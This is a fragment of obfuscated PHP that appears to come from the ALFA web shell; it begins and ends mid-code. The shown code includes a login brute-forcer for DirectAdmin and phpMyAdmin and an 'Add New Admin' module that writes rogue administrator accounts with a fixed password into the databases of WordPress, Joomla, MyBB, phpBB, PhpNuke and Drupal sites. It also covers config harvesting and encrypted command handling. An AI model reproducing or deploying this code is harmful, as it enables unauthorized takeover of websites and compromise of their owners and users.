"1" => "Yes"); goto DIyOG; OmUNA: foreach ($lg_array as $key => $val) { $icon_html .= "<option value="" . $key . "" " . ($GLOBALS["DB_NAME"]["show_icons"] == "1" ? "selected" : '') . ">" . $val . "</option>"; } goto xsLcN; aD6Kg: foreach ($lg_array as $key => $val) { $protect_html .= "<option value="" . $key . "" " . ($GLOBALS["DB_NAME"]["safemode"] == "1" ? "selected" : '') . ">" . $val . "</option>"; } goto OmUNA; VWS3I: } elseif ($_POST["alfa8"] == "color") { goto uS9OZ; f5aSX: if ($_POST["alfa7"] == "export") { goto o1NM8; jjWUa: $glob_colors = $GLOBALS["__ALFA_COLOR__"]; goto Iflzg; Iflzg: $array = array(); goto gqlHG; gqlHG: foreach ($glob_colors as $k => $v) { if (isset($colors[$k]) && !empty($colors[$k]) && !$is_default) { $v = trim($colors[$k]); } else { $v = trim(is_array($v) ? $v["key_color"] : $v); } $array[$k] = $v; } goto DoT4v; o1NM8: echo __pre(); goto PCNLd; DoT4v: $file = "alfa_color_config_" . date("Y-m-d-h_i_s") . ".conf"; goto vPxA0; xwWrg: if (!@file_put_contents($file, $config)) { echo "<p><center>Color Config:<br><br><textarea rows="12" cols="70" type="text">" . $config . "</textarea></center></p>"; } else { echo "<h3><p><center><a class="actions" href="javascript:void(0);" onclick="g('FilesTools',null,'" . $file . "', 'download')"><font color="#0F0">Download Config</font></a></center></p></h3>"; } goto gSl12; PCNLd: $colors = is_array($GLOBALS["DB_NAME"]["color"]) ? $GLOBALS["DB_NAME"]["color"] : array(); goto jjWUa; vPxA0: $config = json_encode($array, JSON_PRETTY_PRINT); goto xwWrg; gSl12: } goto j6nxs; nHsaK: echo "<tr><td style="text-align:center;">-</td><td style="text-align:center;"><div class="tbltxt">*</div></td><td><div style="margin-left:5px;" class="tbltxt">Use Default Color:</div></td><td></td><td><center><input type="checkbox" id="use_default_color" value="1"></center></td></tr>"; goto acP2r; geaBD: echo "<table border="1"><tbody>"; goto X96ko; QLLYN: $x = 1; goto E1v9c; E1v9c: foreach ($GLOBALS["__ALFA_COLOR__"] as $key => $value) { goto DZ2ZB; DZ2ZB: $multi = ''; goto U18PG; U18PG: if (is_array($value)) { if (isset($value["multi_selector"])) { $multi = __ZW5jb2Rlcg(json_encode($value)); } } goto tlvjz; tlvjz: $value = alfa_getColor($key); goto kjCH4; x7pHr: echo str_replace(array("{index}", "{target}", "{color}", "{multi}", "{help}"), array($x++, $key, $value, $multi, $help), $template); goto mYf0U; kjCH4: $help = strtolower(str_replace(array(":", "+"), array("_", "_plus"), $key)); goto x7pHr; mYf0U: } goto nHsaK; uS9OZ: echo "<center><p><div class="txtfont_header">| Custom Color |</div></p><form onSubmit="reloadColors();return false;" method='post'>"; goto geaBD; acP2r: echo "</tbody></table><p><input type="submit" name="btn" value=" "></p></form><p><button style="padding:4px;;margin-right:20px;" onclick="$('importFileBtn').click();" class="button"> Import </button> <button style="padding:4px;margin-left:20px;" onclick="g('settings',null,null,null,null,null,null,null,'export','color')" class="button"> Export </button></center></p>"; goto f5aSX; j6nxs: if ($_POST["alfa2"] == ">>") { goto vSLFa; vSLFa: echo __pre(); goto GhQEf; NE4sM: $array = ''; goto UdVHs; w5H5D: $basename = @basename($_SERVER["PHP_SELF"]); goto ympsC; h34WG: @chdir($GLOBALS["home_cwd"]); goto w5H5D; ERPDL: if (preg_match($color, $data, $e)) { goto CPiQH; YYm1n: $data = str_replace($e[0], $new, $data); goto YjAjU; CPiQH: $new = "'color' => array(" . $array . "),"; goto YYm1n; YjAjU: if (@file_put_contents($basename, $data)) { echo "<center><p><h3>[+] Success...</h3></p></center><script>location.reload();</script>"; } else { echo "<center><p><h3>[-] We Not have permission to Edit shell...!</h3></p></center>"; } goto ezY2p; ezY2p: } else { echo "<center><p><h3>[-] Error...!</h3></p></center>"; } goto fx9B9; ympsC: $data = @file_get_contents($basename); goto Af6Md; Af6Md: $color = "/'color'(.*?)\),/s"; goto ERPDL; UdVHs: $is_default = isset($_POST["alfa3"]) && $_POST["alfa3"] == "1" ? true : false; goto AJYLn; GhQEf: $colors = json_decode($_POST["alfa1"], true); goto NE4sM; Z2eHE: foreach ($glob_colors as $k => $v) { if (isset($colors[$k]) && !empty($colors[$k]) && !$is_default) { $v = trim($colors[$k]); } else { $v = trim(is_array($v) ? $v["key_color"] : $v); } $array .= """ . trim($k) . "" => "" . $v . "","; } goto h34WG; AJYLn: $glob_colors = $GLOBALS["__ALFA_COLOR__"]; goto Z2eHE; fx9B9: } goto FcN89; X96ko: $template = "<tr><td style="text-align:center;"><a href="http://solevisible.com/customcolors/{help}.png" target="_blank"><font color="#00FF00">Help</font></a></td><td style="text-align:center;"><div class="tbltxt">{index}</div></td><td><div class="tbltxt" style="margin-left:5px;">{target}:</div></td><td><input style="width:60px;" multi="{multi}" id="gui_{target}" onChange="colorHandler(this);" target=".{target}" type="color" value="{color}"></td><td><input type="text" style="text-align:center;" multi="{multi}" onkeyup="colorHandlerKey(this);" target=".{target}" id="input_{target}" class="colors_input" placeholder="#ffffff" value="{color}"></td></tr>"; goto QLLYN; FcN89: } goto jazRu; zVMuV: alfahead(); goto ank54; npFDh: } goto tFDUs; RFckQ: $RxPWPyQqTL = "cha" . "r" . "Cod" . "e" . "A" . "t" . ''; goto oq_nl; W2kYD: function getConfigHtml($cms) { goto m1R4w; SRdjS: $content .= "</form>"; goto nnXr8; nnXr8: return $content; goto IDB02; cQ0Em: foreach ($cms_array as $key => $val) { $content .= "<option value='{$key}' " . ($key == $cms ? "selected=selected" : '') . ">{$val}</option>"; } goto DUNWE; CtITF: $content .= "<form onSubmit='g("GetConfig",null,this.cms.value,this.path.value);return false;'><div class='txtfont'>Cms: </div> <select name='cms'style='width:100px;'>"; goto cQ0Em; m1R4w: $content = ''; goto zJhSb; DUNWE: $content .= "</select> <div class='txtfont'>Path(installed cms/Config): </div> <input type='text' name='path' value='" . $_SERVER["DOCUMENT_ROOT"] . "/' size='30' /> <button class='button'>GetConfig</button>"; goto SRdjS; zJhSb: $cms_array = array("wp" => "WordPress", "vb" => "vBulletin", "whmcs" => "Whmcs", "joomla" => "Joomla", "phpnuke" => "PHPNuke", "phpbb" => "PHPBB", "mybb" => "MyBB", "drupal" => "Drupal", "smf" => "SMF"); goto CtITF; IDB02: } goto i0AIl; eTrml: @set_time_limit(0); goto dsCAl; gWi5O: function Alfa_DirectAdmin_Cracker($info) { goto Q4yQ3; sv6Zt: curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0); goto ZG8BK; AtZzZ: $curl_errno = curl_errno($curl); goto AjYVa; Q4yQ3: if (!$info["mysql"]) { $url = $info["protocol"] . $info["target"] . ":" . $info["port"] . "/CMD_LOGIN"; } else { $url = $info["protocol"] . $info["target"] . "/phpmyadmin"; } goto mYM2Y; bInua: curl_setopt($curl, CURLOPT_USERPWD, $info["username"] . ":" . $info["password"]); goto JPA7c; ioLUP: curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); goto PhNL_; tSQRb: if ($curl_errno > 0) { echo "<font color='red'>Error: {$curl_error}</font><br>"; } elseif (preg_match("/CMD_FILE_MANAGER|frameset/i", $result)) { goto V3b8V; V3b8V: echo "UserName: <font color="red">" . $info["username"] . "</font> PassWord: <font color="red">" . $info["password"] . "</font><font color="green">  Login Success....</font><br>"; goto gVk2V; EYEJL: CrackerResualt($info); goto EEykt; gVk2V: $info["target"] = $url; goto EYEJL; EEykt: } goto Ja9nx; lTDfW: curl_setopt($curl, CURLOPT_URL, $url); goto bInua; mYM2Y: $curl = curl_init(); goto ioLUP; JgYHy: curl_setopt($curl, CURLOPT_HEADER, 0); goto Us3wJ; W1CAF: $result = curl_exec($curl); goto AtZzZ; PhNL_: curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0"); goto sv6Zt; ZG8BK: curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0); goto JgYHy; Us3wJ: curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); goto lTDfW; AjYVa: $curl_error = curl_error($curl); goto tSQRb; Ja9nx: curl_close($curl); goto H9J7T; JPA7c: if ($info["mysql"]) { curl_setopt($curl, CURLOPT_HTTPAUTH, CURLAUTH_ANY); } goto W1CAF; H9J7T: } goto zhsok; ZOZAR: function decrypt_post($str, $pwd) { if (__ALFA_POST_ENCRYPTION__) { goto U4SkN; vctiI: $enc_chr = ''; goto PrrKA; vjpIJ: return __ZGVjb2Rlcg($enc_str); goto mi1m0; U4SkN: $pwd = __ZW5jb2Rlcg($pwd); goto KvGXj; J7aiZ: $i = 0; goto CEjS6; CEjS6: while ($i < strlen($str)) { for ($j = 0; $j < strlen($pwd); $j++) { $enc_chr = chr(ord($str[$i]) ^ ord($pwd[$j])); $enc_str .= $enc_chr; $i++; if ($i >= strlen($str)) { break; } } } goto vjpIJ; PrrKA: $enc_str = ''; goto J7aiZ; KvGXj: $str = __ZGVjb2Rlcg($str); goto vctiI; mi1m0: } else { return __ZGVjb2Rlcg($str); } } goto uneHH; uM4l3: function alfapwchanger() { goto wDmLQ; O1wfL: if (isset($_POST["alfa8"]) && $_POST["alfa8"] == "nuke") { goto VfjgG; vDGhP: if ($_POST["alfa1"] && $_POST["alfa1"] == ">>") { goto dD86b; k6hSn: $hash = md5($pwd); goto j6Qjv; Cvstz: $admin = $_POST["alfa7"]; goto h3enN; W0sKU: $prefix = $_POST["alfa10"]; goto NqCJD; NqCJD: $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn)); goto k6hSn; MIuon: if ($solevisible) { __alert("Success... " . $admin . " is created..."); } goto ZJF3H; GRSC4: $database = $_POST["alfa3"]; goto cCsd0; dD86b: $localhost = $_POST["alfa2"]; goto GRSC4; h3enN: $SQL = $_POST["alfa9"]; goto W0sKU; tHf1v: $password = $_POST["alfa5"]; goto Cvstz; cCsd0: $username = $_POST["alfa4"]; goto tHf1v; j6Qjv: $solevisible = @mysqli_query($conn, "insert into " . $prefix . "_authors(aid,name,email,pwd) values('{$admin}','God','{$SQL}','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn)); goto MIuon; ZJF3H: } goto QRtP9; EkbqQ: $table = array("td1" => array("color" => "FFFFFF", "tdName" => "Mysql Host", "id" => "db_host", "inputName" => "localhost", "inputValue" => "localhost", "inputSize" => "50"), "td2" => array("color" => "FFFFFF", "tdName" => "Db Name", "id" => "db_name", "inputName" => "database", "inputValue" => '', "inputSize" => "50"), "td3" => array("color" => "FFFFFF", "tdName" => "Db User", "id" => "db_user", "inputName" => "username", "inputValue" => '', "inputSize" => "50"), "td4" => array("color" => "FFFFFF", "tdName" => "Db Pass", "id" => "db_pw", "inputName" => "password", "inputValue" => '', "inputSize" => "50"), "td5" => array("color" => "FFFFFF", "tdName" => "Table Prefix", "id" => "db_prefix", "inputName" => "prefix", "inputValue" => '', "inputSize" => "50"), "td6" => array("color" => "FF0000", "tdName" => "Admin User", "inputName" => "admin", "inputValue" => "admin", "inputSize" => "50"), "td7" => array("color" => "FF0000", "tdName" => "Admin Pass", "inputName" => "toftof", "inputValue" => "solevisible", "inputSize" => "50", "disabled" => true), "td8" => array("color" => "FF0000", "tdName" => "Admin Email", "inputName" => "email", "inputValue" => "[email protected]", "inputSize" => "50")); goto itE8C; VfjgG: echo __pre() . "<center><div class="txtfont_header">| PhpNuke |</div><p><p>" . getConfigHtml("phpnuke") . "</p><form onsubmit="g('pwchanger',null,'>>',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,'nuke',this.email.value,this.prefix.value); return false;" method="POST">"; goto EkbqQ; itE8C: create_table($table); goto Go_97; Go_97: echo "<p><input value=" " name="send" type="submit"></p></form></center>"; goto vDGhP; QRtP9: } goto YHDK_; GMWFM: if (isset($_POST["alfa7"]) && $_POST["alfa7"] == "mybb") { goto kHC1D; TQhjm: $table = array("td1" => array("color" => "FFFFFF", "tdName" => "Mysql Host", "id" => "db_host", "inputName" => "localhost", "inputValue" => "localhost", "inputSize" => "50"), "td2" => array("color" => "FFFFFF", "tdName" => "Db Name", "id" => "db_name", "inputName" => "database", "inputValue" => '', "inputSize" => "50"), "td3" => array("color" => "FFFFFF", "tdName" => "Db User", "id" => "db_user", "inputName" => "username", "inputValue" => '', "inputSize" => "50"), "td4" => array("color" => "FFFFFF", "tdName" => "Db Pass", "id" => "db_pw", "inputName" => "password", "inputValue" => '', "inputSize" => "50"), "td5" => array("color" => "FFFFFF", "tdName" => "Table Prefix", "id" => "db_prefix", "inputName" => "prefix", "inputValue" => '', "inputSize" => "50"), "td6" => array("color" => "FF0000", "tdName" => "Admin User", "inputName" => "admin", "inputValue" => "admin", "inputSize" => "50"), "td7" => array("color" => "FF0000", "tdName" => "Admin Pass", "inputName" => "toftof", "inputValue" => "solevisible", "inputSize" => "50", "disabled" => true), "td8" => array("color" => "FF0000", "tdName" => "Admin Email", "inputName" => "email", "inputValue" => "[email protected]", "inputSize" => "50")); goto rtCgh; ppOTT: if ($_POST["alfa1"] && $_POST["alfa1"] == ">>") { goto vXghn; HJiJJ: $prefix = $_POST["alfa10"]; goto O26xR; PMS4r: $solevisible = @mysqli_query($conn, "insert into " . $prefix . "users (uid,username,password,salt,email,usergroup) values(null,'" . $admin . "','e71f2c3265619038d826a1ac6e2b9b8e','ywza68lS','" . $SQL . "','4')") or die(mysqli_error($conn)); goto ve7OG; vXghn: $localhost = $_POST["alfa2"]; goto LR8MU; YPA5m: $SQL = $_POST["alfa9"]; goto HJiJJ; O26xR: $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn)); goto PMS4r; VkIwI: $admin = $_POST["alfa8"]; goto YPA5m; cBw7A: $password = $_POST["alfa5"]; goto VkIwI; DA0pk: $username = $_POST["alfa4"]; goto cBw7A; LR8MU: $database = $_POST["alfa3"]; goto DA0pk; ve7OG: if ($solevisible) { __alert("Success... " . $admin . " is created..."); } goto AaAan; AaAan: } goto mBGf2; kHC1D: echo __pre() . "<center><div class="txtfont_header">| Mybb |</div><p><p>" . getConfigHtml("mybb") . "</p><form onsubmit="g('pwchanger',null,'>>',this.localhost.value,this.database.value,this.username.value,this.password.value,null,'mybb',this.admin.value,this.email.value,this.prefix.value); return false;" method="POST">"; goto TQhjm; M7Rp4: echo "<p><input value=" " name="send" type="submit"></p></form></center>"; goto ppOTT; rtCgh: create_table($table); goto M7Rp4; mBGf2: } goto O1wfL; AvKAd: if (isset($_POST["alfa5"]) && $_POST["alfa5"] == "phpbb") { goto qv2pS; KiOPd: $table = array("td1" => array("color" => "FFFFFF", "tdName" => "Mysql Host", "id" => "db_host", "inputName" => "localhost", "inputValue" => "localhost", "inputSize" => "50"), "td2" => array("color" => "FFFFFF", "tdName" => "Db Name", "id" => "db_name", "inputName" => "database", "inputValue" => '', "inputSize" => "50"), "td3" => array("color" => "FFFFFF", "tdName" => "Db User", "id" => "db_user", "inputName" => "username", "inputValue" => '', "inputSize" => "50"), "td4" => array("color" => "FFFFFF", "tdName" => "Db Pass", "id" => "db_pw", "inputName" => "password", "inputValue" => '', "inputSize" => "50"), "td5" => array("color" => "FFFFFF", "tdName" => "Table Prefix", "id" => "db_prefix", "inputName" => "prefix", "inputValue" => '', "inputSize" => "50"), "td6" => array("color" => "FF0000", "tdName" => "Admin User", "inputName" => "admin", "inputValue" => "admin", "inputSize" => "50"), "td7" => array("color" => "FF0000", "tdName" => "Admin Pass", "inputName" => "toftof", "inputValue" => "solevisible", "inputSize" => "50", "disabled" => true), "td8" => array("color" => "FF0000", "tdName" => "Admin Email", "inputName" => "email", "inputValue" => "[email protected]", "inputSize" => "50")); goto zlKxU; HkrBD: echo "<p><input value=" " name="send" type="submit"></p></form></center>"; goto lBMVY; lBMVY: if ($_POST["alfa1"] && $_POST["alfa1"] == ">>") { goto sMqr_; cJgUT: $database = $_POST["alfa3"]; goto I5Qmy; FLW7U: $solevisible = @mysqli_query($conn, "UPDATE " . $prefix . "users SET username_clean ='" . $admin . "' WHERE username_clean = 'admin'") or die(mysqli_error($conn)); goto Bwtbr; sIzTY: $hash = md5("solevisible"); goto FLW7U; E0StN: $admin = $_POST["alfa8"]; goto SIPP7; wibvW: $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn)); goto sIzTY; gBEjP: $solevisible = @mysqli_query($conn, "UPDATE " . $prefix . "users SET username_clean ='" . $admin . "' WHERE user_type = 3") or die(mysqli_error($conn)); goto vhD6b; vhD6b: $solevisible = @mysqli_query($conn, "UPDATE " . $prefix . "users SET user_password ='" . $hash . "' WHERE user_type = 3") or die(mysqli_error($conn)); goto lMhja; I5Qmy: $username = $_POST["alfa4"]; goto xPRtR; Bwtbr: $solevisible = @mysqli_query($conn, "UPDATE " . $prefix . "users SET user_password ='" . $hash . "' WHERE username_clean = 'admin'") or die(mysqli_error($conn)); goto gBEjP; ozIP8: $prefix = $_POST["alfa10"]; goto wibvW; Sj4d_: if ($solevisible) { __alert("Success... " . $admin . " is created..."); } goto McivR; lMhja: $solevisible = @mysqli_query($conn, "UPDATE " . $prefix . "users SET user_email ='" . $SQL . "' WHERE username_clean = 'admin'") or die(mysqli_error($conn)); goto Sj4d_; SIPP7: $SQL = $_POST["alfa9"]; goto ozIP8; xPRtR: $password = $_POST["alfa6"]; goto E0StN; sMqr_: $localhost = $_POST["alfa2"]; goto cJgUT; McivR: } goto m3zwH; zlKxU: create_table($table); goto HkrBD; qv2pS: echo __pre() . "<center><div class="txtfont_header">| phpBB |</div><p><p>" . getConfigHtml("phpbb") . "</p><form onSubmit="g('pwchanger',null,'>>',this.localhost.value,this.database.value,this.username.value,'phpbb',this.password.value,null,this.admin.value,this.email.value,this.prefix.value); return false;" method="POST">"; goto KiOPd; m3zwH: } goto nHzbN; Bx2Ok: $vals = array("WordPress" => array("wp", 2), "Joomla" => array("joomla", 3), "vBulletin" => array("vb", 5), "phpBB" => array("phpbb", 6), "WHMCS" => array("whmcs", 7), "MyBB" => array("mybb", 8), "Php Nuke" => array("nuke", 9), "Drupal" => array("drupal", 10), "SMF" => array("smf", 11)); goto cHS3m; pA4Oh: echo "<div class=header><center><br><div class="txtfont_header">| Add New Admin |</div>
<center><h3>"; goto Bx2Ok; wDmLQ: alfahead(); goto pA4Oh; J_X5I: if ($_POST["alfa2"] && $_POST["alfa2"] == "joomla") { goto Y_sZ4; Y_sZ4: echo __pre() . "<center><center><div class="txtfont_header">| Joomla |</div><p><p>" . getConfigHtml("joomla") . "</p><form onSubmit="g('pwchanger',null,'>>','joomla',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;" method="POST">"; goto M3m1h; mA2QW: echo "<p><input value=" " name="send" type="submit"></p></form></center>"; goto z38Nu; tQ9tF: create_table($table); goto mA2QW; M3m1h: $table = array("td1" => array("color" => "FFFFFF", "tdName" => "Mysql Host", "id" => "db_host", "inputName" => "localhost", "inputValue" => "localhost", "inputSize" => "50"), "td2" => array("color" => "FFFFFF", "tdName" => "Db Name", "id" => "db_name", "inputName" => "database", "inputValue" => '', "inputSize" => "50"), "td3" => array("color" => "FFFFFF", "tdName" => "Db User", "id" => "db_user", "inputName" => "username", "inputValue" => '', "inputSize" => "50"), "td4" => array("color" => "FFFFFF", "tdName" => "Db Pass", "id" => "db_pw", "inputName" => "password", "inputValue" => '', "inputSize" => "50"), "td5" => array("color" => "FFFFFF", "tdName" => "Table Prefix", "id" => "db_prefix", "inputName" => "prefix", "inputValue" => "jos_", "inputSize" => "50"), "td6" => array("color" => "FF0000", "tdName" => "Admin User", "inputName" => "admin", "inputValue" => "admin", "inputSize" => "50"), "td7" => array("color" => "FF0000", "tdName" => "Admin Pass", "inputName" => "toftof", "inputValue" => "solevisible", "inputSize" => "50", "disabled" => true), "td8" => array("color" => "FF0000", "tdName" => "Admin Email", "inputName" => "email", "inputValue" => "[email protected]", "inputSize" => "50")); goto tQ9tF; z38Nu: if ($_POST["alfa1"] && $_POST["alfa1"] == ">>") { goto B4woe; ZOX8H: $solevisible = @mysqli_query($conn, "select id from " . $prefix . "users where username='" . $admin . "'") or die(mysqli_error($conn)); goto Li15o; MDGY1: $solevisible = @mysqli_query($conn, "insert into " . $prefix . "users (id,name,username,email,password) values(null,'Super User','" . $admin . "','" . $SQL . "','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn)); goto ZOX8H; zoeyI: $admin = $_POST["alfa8"]; goto qu2zc; KTxzr: if ($sole == 1) { $solevis = @mysqli_fetch_assoc($solevisible); $res = $solevis["id"]; } goto yXR1t; yXR1t: $solevisible = @mysqli_query($conn, "INSERT INTO " . $prefix . "user_usergroup_map (user_id,group_id) VALUES ('" . $res . "', '8')") or die(mysqli_error($conn)); goto er4yz; QKxh1: $database = $_POST["alfa4"]; goto zRhNh; qu2zc: $SQL = $_POST["alfa9"]; goto Z1F5t; Z1F5t: $prefix = $_POST["alfa10"]; goto zjv2s; EqwPa: $password = $_POST["alfa6"]; goto zoeyI; Li15o: $sole = @mysqli_num_rows($solevisible); goto KTxzr; zRhNh: $username = $_POST["alfa5"]; goto EqwPa; B4woe: $localhost = $_POST["alfa3"]; goto QKxh1; er4yz: if ($solevisible) { __alert("Success... " . $admin . " is created..."); } goto C3zWi; zjv2s: $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn)); goto MDGY1; C3zWi: } goto Dz0Du; Dz0Du: } goto ox10V; CG8KE: if (isset($_POST["alfa1"]) && $_POST["alfa1"] == "wp") { goto SOhpK; AZt5m: if ($_POST["alfa2"] && $_POST["alfa2"] == ">>") { goto tnHLz; ZzJzx: $username = $_POST["alfa5"]; goto U7byK; RqI5F: $solevisible = @mysqli_query($conn, "insert into " . $prefix . "users (ID,user_login,user_pass,user_email) values(null,'{$admin}','d4a590caacc0be55ef286e40a945ea45','{$SQL}')") or die(mysqli_error($conn)); goto X0y7l; DxH0a: if ($solevisible) { __alert("Success... " . $admin . " is created..."); } goto HNJsq; VmIVx: $solevisible = @mysqli_query($conn, "insert into " . $prefix . "usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'" . $res . "','first_name','solevisible'),(null,'" . $res . "','last_name','solevisible'),(null,'" . $res . "','nickname','solevisible'),(null,'" . $res . "','description','solevisible'),(null,'" . $res . "','rich_editing','true'),(null,'" . $res . "','comment_shortcuts','false'),(null,'" . $res . "','admin_color','fresh'),(null,'" . $res . "','use_ssl','0'),(null,'" . $res . "','show_admin_bar_front','true'),(null,'" . $res . "','" . $prefix . "capabilities','a:1:{s:13:"administrator";b:1;}'),(null,'" . $res . "','" . $prefix . "user_level','10'),(null,'" . $res . "','show_welcome_panel','1'),(null,'" . $res . "','" . $prefix . "dashboard_quick_press_last_post_id','3')") or die(mysqli_error($conn)); goto DxH0a; X0y7l: $solevisible = @mysqli_query($conn, "select ID from " . $prefix . "users where user_login='" . $admin . "'") or die(mysqli_error($conn)); goto UdMgz; agKmL: $SQL = $_POST["alfa9"]; goto js1l1; IC0UP: $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn)); goto RqI5F; U7byK: $password = $_POST["alfa6"]; goto PSnf_; gu1dx: $database = $_POST["alfa4"]; goto ZzJzx; xVDLc: if ($sole == 1) { $solevis = @mysqli_fetch_assoc($solevisible); $res = $solevis["ID"]; } goto VmIVx; UdMgz: $sole = @mysqli_num_rows($solevisible); goto xVDLc; PSnf_: $admin = $_POST["alfa8"]; goto agKmL; js1l1: $prefix = $_POST["alfa10"]; goto IC0UP; tnHLz: $localhost = $_POST["alfa3"]; goto gu1dx; HNJsq: } goto g2FFN; oXAsB: create_table($table); goto UseI5; UseI5: echo "<p><input value=" " name="send" type="submit"></p></form>"; goto AZt5m; Mo8Y8: $table = array("td1" => array("color" => "FFFFFF", "tdName" => "Mysql Host", "id" => "db_host", "inputName" => "localhost", "inputValue" => "localhost", "inputSize" => "50"), "td2" => array("color" => "FFFFFF", "tdName" => "Db Name", "id" => "db_name", "inputName" => "database", "inputValue" => '', "inputSize" => "50"), "td3" => array("color" => "FFFFFF", "tdName" => "Db User", "id" => "db_user", "inputName" => "username", "inputValue" => '', "inputSize" => "50"), "td4" => array("color" => "FFFFFF", "tdName" => "Db Pass", "id" => "db_pw", "inputName" => "password", "inputValue" => '', "inputSize" => "50"), "td5" => array("color" => "FFFFFF", "tdName" => "Table Prefix", "id" => "db_prefix", "inputName" => "prefix", "inputValue" => "wp_", "inputSize" => "50"), "td6" => array("color" => "FF0000", "tdName" => "Admin User", "inputName" => "admin", "inputValue" => "admin", "inputSize" => "50"), "td7" => array("color" => "FF0000", "tdName" => "Admin Pass", "inputName" => "kh", "inputValue" => "solevisible", "inputSize" => "50", "disabled" => true), "td8" => array("color" => "FF0000", "tdName" => "Admin Email", "inputName" => "email", "inputValue" => "[email protected]", "inputSize" => "50")); goto oXAsB; SOhpK: echo __pre() . "<center><center><div class="txtfont_header">| WordPress |</div>
\xa<p>" . getConfigHtml("wp") . "</p><form onSubmit="g('pwchanger',null,'wp','>>',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;" method="POST">"; goto Mo8Y8; g2FFN: } goto J_X5I; YHDK_: if (isset($_POST["alfa9"]) && $_POST["alfa9"] == "drupal") { goto K9sv1; Cpzbm: if ($_POST["alfa1"] && $_POST["alfa1"] == ">>") { goto eGuwt; n80Ak: $sole = mysqli_num_rows($solevisible); goto JVrDf; FFrE8: $getDescuid = @mysqli_query($conn, "select uid from users order by uid desc limit 0,1"); goto GwfJx; is_hH: $admin = $_POST["alfa8"]; goto zmm18; oJs8E: $getdescuid = $getDescuid++; goto S1srJ; O2HFO: $username = $_POST["alfa5"]; goto pxyFr; L9jF_: if ($solevisible) { __alert("Success... " . $admin . " is created..."); } goto Kcea6; i7ZjN: $database = $_POST["alfa4"]; goto O2HFO; eGuwt: $localhost = $_POST["alfa2"]; goto i7ZjN; zmm18: $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn)); goto FFrE8; GwfJx: $getDescuid = @mysqli_fetch_assoc($getDescuid); goto idAfE; JVrDf: if ($sole == 1) { $solevis = mysqli_fetch_assoc($solevisible); $res = $solevis["uid"]; } goto hv9_f; idAfE: $getDescuid = $getDescuid["uid"]; goto oJs8E; hv9_f: $solevisible = @mysqli_query($conn, "INSERT INTO users_roles (uid,rid) VALUES ('" . $res . "', '3')") or die(mysqli_error($conn)); goto L9jF_; S1srJ: $solevisible = @mysqli_query($conn, "insert into users (uid,name,pass,mail,signature_format,status,timezone,init) values('{$getDescuid}','{$admin}','$S$DP2y9AbolCBOd\/WyQcpzu4zF57qE0noyCNeXZWv.37R66VsFjOiC','[email protected]','filtered_html','1','Europe/Berlin','[email protected]')") or die(mysqli_error($conn)); goto R2De3; pxyFr: $password = $_POST["alfa6"]; goto is_hH; R2De3: $solevisible = @mysqli_query($conn, "select uid from users where name='" . $admin . "'") or die(mysqli_error($conn)); goto n80Ak; Kcea6: } goto lJ_VG; PCdKd: echo "<p><input value=" " name="send" type="submit"></p></form></center>"; goto Cpzbm; K9sv1: echo __pre() . "<center><div class="txtfont_header">| Drupal |</div><p><p>" . getConfigHtml("drupal") . "</p><form onSubmit="g('pwchanger',null,'>>',this.localhost.value,null,this.database.value,this.username.value,this.password.value,null,this.admin.value,'drupal'); return false;" method="POST">"; goto W30UA; W30UA: $table = array("td1" => array("color" => "FFFFFF", "tdName" => "Mysql Host", "id" => "db_host", "inputName" => "localhost", "inputValue" => "localhost", "inputSize" => "50"), "td2" => array("color" => "FFFFFF", "tdName" => "Db Name", "id" => "db_name", "inputName" => "database", "inputValue" => '', "inputSize" => "50"), "td3" => array("color" => "FFFFFF", "tdName" => "Db User", "id" => "db_user", "inputName" => "username", "inputValue" => '', "inputSize" => "50"), "td4" => array("color" => "FFFFFF", "tdName" => "Db Pass", "id" => "db_pw", "inputName" => "password", "inputValue" => '', "inputSize" => "50"), "td6" => array("color" => "FF0000", "tdName" => "Admin User", "inputName" => "admin", "inputValue" => "admin", "inputSize" => "50"), "td7" => array("color" => "FF0000", "tdName" => "Admin Pass", "inputName" => "toftof", "inputValue" => "solevisible", "inputSize" => "50", "disabled" => true)); goto XFgiM; XFgiM: create_table($table); goto PCdKd; lJ_VG: } goto HB3T9; sDwpz: alfafooter(); goto km3Z2; cHS3m: Alfa_Create_A_Tag("pwchanger", $vals); goto nDQbL; aSe6C: echo "</div>"; goto sDwpz; nDQbL: echo "</h3></center>"; goto CG8KE; ox10V: if ($_POST["alfa4"] && $_POST["alfa4"] == "vb") { goto u646v; x69Db: create_table($table); goto qV9cf; UZI8k: $table = array("td1" => array("color" => "FFFFFF", "tdName" => "Mysql Host", "id" => "db_host", "inputName" => "localhost", "inputValue" => "localhost", "inputSize" => "50"), "td2" => array("color" => "FFFFFF", "tdName" => "Db Name", "id" => "db_name", "inputName" => "database", "inputValue" => '', "inputSize" => "50"), "td3" => array("color" => "FFFFFF", "tdName" => "Db User", "id" => "db_user", "inputName" => "username", "inputValue" => '', "inputSize" => "50"), "td4" => array("color" => "FFFFFF", "tdName" => "Db Pass", "id" => "db_pw", "inputName" => "password", "inputValue" => '', "inputSize" => "50"), "td5" => array("color" => "FFFFFF", "tdName" => "Table Prefix", "id" => "db_prefix", "inputName" => "prefix", "inputValue" => '', "inputSize" => "50"), "td6" => array("color" => "FF0000", "tdName" => "Admin User", "inputName" => "admin", "inputValue" => "admin", "inputSize" => "50"), "td7" => array("color" => "FF0000", "tdName" => "Admin Pass", "inputName" => "hi", "inputValue" => "solevisible", "inputSize" => "50", "disabled" => true), "td8" => array("color" => "FF0000", "tdName" => "Admin Email", 